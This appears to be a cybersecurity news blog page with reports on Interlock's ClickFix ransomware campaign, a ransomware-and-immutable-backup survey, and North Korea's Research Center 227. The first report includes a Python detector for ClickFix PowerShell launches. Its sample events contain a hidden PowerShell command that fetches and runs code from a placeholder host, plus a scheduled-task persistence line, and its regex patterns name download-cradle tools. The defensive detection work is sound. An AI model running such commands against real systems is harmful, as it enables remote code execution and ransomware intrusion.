#CyberResearchers
Interlock Ransomware Gang Deploys ClickFix Attacks to Breach Corporate Networks

Cybersecurity researchers have revealed that the Interlock ransomware gang has adopted the ClickFix social engineering technique to infiltrate corporate networks. The method tricks users into running a malicious PowerShell command under the guise of fixing a system error or completing an identity-verification step, and ends with the deployment of file-encrypting malware.

ClickFix attacks have previously been associated with ransomware campaigns, but this is the first confirmed use by Interlock, a ransomware operation that surfaced in late September 2024. The group targets both Windows systems and FreeBSD servers and maintains a dark web leak portal to pressure victims into paying ransoms that can reach millions of dollars. Interlock does not appear to operate as a ransomware-as-a-service (RaaS).

According to Sekoia researchers, Interlock began using ClickFix in January 2025. The attackers set up fake websites mimicking legitimate IT tools such as Microsoft Teams and Advanced IP Scanner. These sites show a "Fix it" button that silently copies a malicious PowerShell command to the clipboard and instructs the user to paste and run it. If executed, the command downloads a 36 MB PyInstaller payload that installs the malware while presenting itself as the legitimate tool.

Researchers found the campaign hosted on spoofed domains including microsoft-msteams[.]com, microstteams[.]com, ecologilives[.]com, and advanceipscaner[.]com; only the last of these served the actual dropper, disguised as Advanced IP Scanner. When the pasted command runs, a hidden PowerShell window performs system reconnaissance, establishes persistence via the Windows Registry, and exfiltrates data.

The attackers deploy a range of malware through their command-and-control (C2) servers, including LummaStealer, BerserkStealer, keyloggers, and the Interlock RAT, a basic remote access trojan capable of dynamic configuration, file exfiltration, shell command execution, and DLL injection.

After the initial compromise, Interlock operators use stolen credentials to move laterally over RDP, also leveraging remote access tools such as PuTTY, AnyDesk, and LogMeIn. Data is exfiltrated to Azure Blob Storage, after which the Windows variant of the Interlock ransomware is scheduled to run daily at 8:00 PM, a redundancy measure that ensures encryption happens even if the initial payload fails. The gang's ransom notes have also evolved and now emphasise the legal and regulatory consequences of leaked data.

ClickFix is gaining popularity among cybercriminal groups, with recent reports also linking the technique to North Korean state-sponsored actors such as the Lazarus Group, who use similar lures against job seekers in the cryptocurrency sector.
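The pasted command, the hidden PowerShell window and the daily 8:00 PM schedule described above all leave recognisable traces in process-creation telemetry. The following Python is an added example written for this page, not code from the article or from Sekoia. It scores constructed Sysmon-style process events for the hallmarks of a ClickFix launch (hidden window, execution-policy bypass, an encoded or downloaded payload, Invoke-Expression, and a parent such as explorer.exe or a browser that indicates a person pasted the command rather than a script), decodes `-EncodedCommand` payloads so the same rules apply to them, and separately flags schtasks.exe registering a daily 20:00 task. The sample events, the placeholder domain advanceipscaner.example, the rule weights and the alert threshold are all assumptions made for the example.

```python
"""Score process-creation events for ClickFix-style PowerShell launches.

Added example for this page, not code from the article or from Sekoia.
Input records are constructed here in the shape of trimmed Sysmon Event ID 1
(or Windows 4688) entries; only image, parent and cmdline are used.
Weights, threshold and the placeholder domain are assumptions.
"""
import base64
import ntpath
import re

# powershell.exe accepts any unambiguous prefix of a parameter name (-w, -win,
# -WindowStyle), hence the `-w[a-z]*` style; 1 is ProcessWindowStyle.Hidden.
HIDDEN_WINDOW = re.compile(r"(?i)(?:^|\s)-w[a-z]*\s+(?:hidden|1)\b")
POLICY_BYPASS = re.compile(r"(?i)(?:^|\s)-e[a-z]*\s+bypass\b")
ENCODED_CMD = re.compile(r"(?i)(?:^|\s)-e[a-z]*\s+([A-Za-z0-9+/]{20,}={0,2})")
DOWNLOAD_CRADLE = re.compile(
    r"(?i)\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
    r"downloadfile|start-bitstransfer|net\.webclient|curl|wget)\b")
INVOKE_EXPRESSION = re.compile(r"(?i)\b(?:iex|invoke-expression)\b")
# A parent like Explorer (Run dialog) or a browser means a person pasted it.
USER_FACING_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
# The article reports the Windows ransomware stage scheduled daily at 8:00 PM.
DAILY_2000_TASK = re.compile(r"(?i)/sc\s+daily\b.*/st\s+20:00\b")
ALERT_THRESHOLD = 6

WEIGHTED_RULES = [
    (HIDDEN_WINDOW, 3, "hidden window"),
    (POLICY_BYPASS, 2, "execution policy bypass"),
    (DOWNLOAD_CRADLE, 3, "download cradle"),
    (INVOKE_EXPRESSION, 2, "invoke-expression"),
]

# Constructed sample events, not real telemetry. The -enc payload in event 2
# decodes to the harmless, deliberately truncated text "IEX (New-Object".
SAMPLE_EVENTS: list[dict[str, str]] = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",  # 0: pasted "Fix it" command
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell -w hidden -ep bypass -c "iex (irm https://advanceipscaner.example/fix)"'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",  # 1: admin maintenance script
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\ops\rotate-logs.ps1"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",  # 2: encoded variant from a browser
     "parent": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "cmdline": "powershell -nop -w 1 -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"image": r"C:\Windows\System32\schtasks.exe",                            # 3: daily 20:00 ransomware task
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'schtasks /create /tn "Updater" /tr C:\Users\Public\svchost.exe /sc daily /st 20:00 /f'},
    {"image": r"C:\Windows\System32\schtasks.exe",                            # 4: benign nightly job
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'schtasks /create /tn "Backup" /tr C:\ops\backup.cmd /sc daily /st 03:00'},
]


def decode_encoded_command(token: str) -> str:
    """Decode a -EncodedCommand argument (base64 of UTF-16LE text); '' if invalid."""
    try:
        raw = base64.b64decode(token + "=" * (-len(token) % 4), validate=True)
    except ValueError:
        return ""
    return raw.decode("utf-16le", errors="ignore")


def score_powershell(event: dict[str, str]) -> tuple[int, list[str]]:
    """Return (score, reasons) for a PowerShell launch, (0, []) for anything else."""
    if ntpath.basename(event["image"]).lower() not in {"powershell.exe", "pwsh.exe"}:
        return 0, []
    text = event["cmdline"]
    score, reasons = 0, []
    enc = ENCODED_CMD.search(text)
    if enc:
        score += 3
        reasons.append("encoded command")
        # Inspect the decoded script too, so the rules still fire on -enc payloads.
        text += " " + decode_encoded_command(enc.group(1))
    for pattern, weight, label in WEIGHTED_RULES:
        if pattern.search(text):
            score += weight
            reasons.append(label)
    if ntpath.basename(event["parent"]).lower() in USER_FACING_PARENTS:
        score += 2
        reasons.append("launched from explorer/browser")
    return score, reasons


def flag_scheduled_task(event: dict[str, str]) -> list[str]:
    """Flag schtasks.exe registering a daily 20:00 task (the article's encryption schedule)."""
    if ntpath.basename(event["image"]).lower() != "schtasks.exe":
        return []
    return ["daily task at 20:00"] if DAILY_2000_TASK.search(event["cmdline"]) else []


def detect(events: list[dict[str, str]]) -> list[dict]:
    """Return one alert per event whose combined evidence reaches ALERT_THRESHOLD."""
    alerts = []
    for idx, event in enumerate(events):
        score, reasons = score_powershell(event)
        task_reasons = flag_scheduled_task(event)
        if task_reasons:  # the schedule alone is worth an alert
            score += ALERT_THRESHOLD
            reasons += task_reasons
        if score >= ALERT_THRESHOLD:
            alerts.append({"index": idx, "score": score, "reasons": reasons,
                           "cmdline": event["cmdline"]})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"[{alert['score']:>2}] event {alert['index']}: {', '.join(alert['reasons'])}")
        print(f"     {alert['cmdline']}")
```

Run as-is, it alerts on events 0, 2 and 3 and stays quiet on the administrator's signed script and the 03:00 backup job. Two complements are worth pairing with it on real hosts: PowerShell script block logging (Event ID 4104) records the decoded script content even when the command line is encoded, and commands a user pasted into the Win+R dialog are recorded under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`, which `Get-ItemProperty` can dump during triage.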

Interlock Ransomware Gang Deploys ClickFix Attacks to Breach Corporate Networks #CyberAttacks #CyberResearchers #DarkWeb

Ransomware Attacks Surge in Q1 2025 as Immutable Backup Emerges as Critical Defense

Ransomware attacks rose sharply in the first quarter of 2025: new research from Object First reports an 84% increase over the same period in 2024, and nearly two-thirds of organizations report at least one attack in the past two years. The findings suggest that for most businesses ransomware is no longer a matter of "if" but "when".

The study also offers some encouragement. A large majority of IT decision-makers (81%) now regard immutable backup storage as the most effective defense against ransomware. Immutable storage ensures that once data is written it cannot be changed or deleted, giving organizations a recovery path that does not depend on paying the ransom when other controls fail.

The report highlights a gap between awareness and action, however. While most IT professionals acknowledge the benefits of immutable backups, only 59% of organizations have implemented such storage, and just 58% keep multiple copies of their data in separate locations, short of the recommended 3-2-1 strategy (three copies, on two different media, one of them off-site). This gap leaves many companies exposed.

Attackers are also adapting their methods. 96% of organizations that experienced ransomware in the last two years had their backup systems targeted at least once, and 10% had their backup storage compromised in every incident. Attackers now routinely try to destroy recovery options to increase the pressure on victims to pay.

Many businesses still rely heavily on traditional IT security hardening; 61% of respondents believe this approach is sufficient. Yet ransomware operators routinely get past such defenses with phishing emails, stolen credentials, and remote access tools. Object First therefore recommends a "breach mentality": assume an eventual breach and focus on limiting the damage.

A Zero Trust architecture paired with immutable backup is the recommended foundation. Organizations are urged to segment networks, restrict user access to the data they actually need, and enforce multi-factor authentication. As cloud adoption grows, many companies are also turning to immutable cloud storage for flexible, scalable protection. Together, these measures provide a more resilient defense against the current ransomware landscape.

Ransomware Attacks Surge in Q1 2025 as Immutable Backup Emerges as Critical Defense #cloudstorage #CyberAttacks #CyberResearchers

North Korea Establishes Research Center 227 to Strengthen Cyber Warfare Capabilities

North Korea has reportedly launched a new cyber research unit, Research Center 227, to enhance its hacking capabilities and intelligence operations. According to Daily NK, the center is expected to operate around the clock, providing real-time support to North Korean intelligence agencies by developing advanced cyber tools.

The initiative reflects North Korea's growing reliance on cyber warfare as a core part of its security strategy. In February 2025, North Korean leadership directed the Reconnaissance General Bureau (RGB) under the General Staff Department to strengthen the nation's offensive cyber capabilities. Research Center 227 was formed under that directive to develop hacking techniques and cyber warfare tools aimed at infiltrating foreign systems, disrupting critical infrastructure, and stealing sensitive data from targeted nations.

The facility will recruit approximately 90 highly skilled professionals, including graduates of top universities and holders of advanced degrees in computer science. Unlike frontline operatives who execute attacks, these researchers will focus on creating and refining malware, intrusion methods, and other offensive tooling. By centralizing its cyber research, North Korea aims to produce more sophisticated digital weapons that its operational hacking units can deploy in intelligence and espionage missions.

North Korea has significantly expanded its cyber operations in recent years. Its state-sponsored groups, such as Lazarus, have carried out large-scale attacks worldwide, including financial cybercrime, espionage, and cryptocurrency theft against both private companies and government agencies. Their activities have included spreading malware, infiltrating secure networks, and deploying information-stealing tools against Western organizations.

One particularly deceptive tactic is the "Contagious Interview" campaign, in which operators pose as recruiters or hiring managers to persuade professionals to download malware disguised as video conferencing applications. The technique has given the attackers access to corporate systems and valuable credentials. There have also been numerous cases of North Korean operatives using false identities to obtain jobs at global technology firms, potentially gaining access to critical software infrastructure or engaging in fraud.

With Research Center 227 in place, North Korea is likely to intensify its cyber warfare operations and make them more strategic and efficient. Custom malware, refined intrusion techniques, and advanced espionage methods could further increase the scale and complexity of North Korean attacks. As these threats evolve, governments and security professionals worldwide will need to strengthen their defenses accordingly.

North Korea Establishes Research Center 227 to Strengthen Cyber Warfare Capabilities #CyberIntelligence #CyberResearchers #CyberSecurity
